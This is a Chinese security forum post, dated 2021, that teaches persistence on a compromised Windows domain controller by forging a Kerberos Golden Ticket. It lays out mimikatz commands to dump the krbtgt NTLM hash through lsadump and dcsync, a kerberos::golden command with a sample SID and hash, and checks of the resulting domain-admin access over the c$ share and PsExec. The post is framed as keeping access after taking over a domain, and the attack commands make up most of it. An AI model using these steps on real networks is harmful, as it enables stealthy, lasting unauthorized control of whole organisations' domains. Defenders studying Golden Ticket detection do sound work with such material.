域控权限维持(上)

zhaorong · 发表于网络安全 2021-7-3 14:58:19


	域控权限维持(上) 在我们取得域控账号密码后防止密码被改失去权限会使用隐蔽后门一系列手段来维持我们取得的域控权限把恶意文件放在Windows启动项目录中是最简单的方式但是隐蔽性差较主流的域控权限维持方法通常有三种本篇讲第一种Golden Ticket。 Golden Ticket Golden Ticket 黄金票据黄金票据是伪造票据授予票据 TGT 也被称为认证票据。mimikatz 工具把Golden Ticket的这种特性称为万能票据。 Krbtgt账号用来创建票据授予服务加密的密钥该账号在创建域控制器时由系统自动创建并且其密码随机分配Kerberos 黄金票据是有效的TGT Kerberos票据因为它是由域Kerberos帐户 KRBTGT加密和签名的。TGT仅用于向域控制器上的 KDC服务证明用户已被其他域控制器认证。TGT被KRBTGT密码散列加密并且可以被域中的任何KDC服务解密的。利用krbtgt用户和Hash伪造票据授予票据 TGT冒充任意用户身份无限制地访问整个域中的机器且还可以提升为域管理员。黄金票据的条件要求： 1.域名称[AD PowerShell模块：（Get-ADDomain）.DNSRoot] 2.域的SID 值[AD PowerShell模块：（Get-ADDomain）.DomainSID.Value] 3.域的KRBTGT账户NTLM密码哈希 4.伪造用户名复制代码接下来我们对Golden Ticket进行利用测试。这里域控制器为 Server 2008 R2 Sp1 192.168.239.138 dc.pen testlab.com,域内主机为Server 2008 R2 192.168.239.133 zhangsan-pc.pentestlab.com。具体步骤如下。 1.域管理 net group "domain admins" /domain 复制代码查找域管理员执行效果如下 2.域SID 执行 whoami /user 命令删除结果中SID的最后部分获取域SID得到的效果如下如果我们有 PsTools,那么也可以使用PsGetsid.exe获取SID。 3.NTLM Hash 获取krbtgt账户的NTLM Hash需要拥有访问域控制器的权限使用交互方式或远程方式登录域控制器后使用mimikatz来提取krbtgt账户的NTLM Hash,命令如下: privilege::debug mimikatz # lsadump::1sa /inject /name:krbtgt 复制代码或者 mimikatz # 1sadump::dcsync /domain.pentestlab.com /user:krbtgt 复制代码获取krbtgt账户信息执行效果如下。 4.Pass-the-Ticket攻击伪造Golden Ticket进行Pass-the-Ticket攻击伪造项主要包括以下3个。 1.Domain:pentestlab.com 2.SID:S-1-5-21-2540170591-2917293557-2322194170 3.Hash:d1dd822b253f64cba7163e0509219d33 复制代码生成需要模拟用户的票据。以模拟域管理admin用户为例,执行的命令如下: mimikatz # kerberos::golden /user:admin /domain:pentestlab.com /sid:S-1-5-21-2540170591-29 17293557-2322194170 /krbtgt:d1dd822b253f64cba7163e0509219d33 /admin:admin.tck /ptt 复制代码生成admin用户的票据执行效果如下。 5.验证成功测试获得的域管理权限相关命令如下: dir \\dc.pentestlab.com\c$ P*ec.exe \\dc.pentestlab.com\ cmd.exe 复制代码* 访问C盘目录文件执行效果分别如下。以域管理权限执行cmd.exe 执行效果分别如下。

微信扫一扫 分享朋友圈

域控权限维持(上)

微信扫一扫分享朋友圈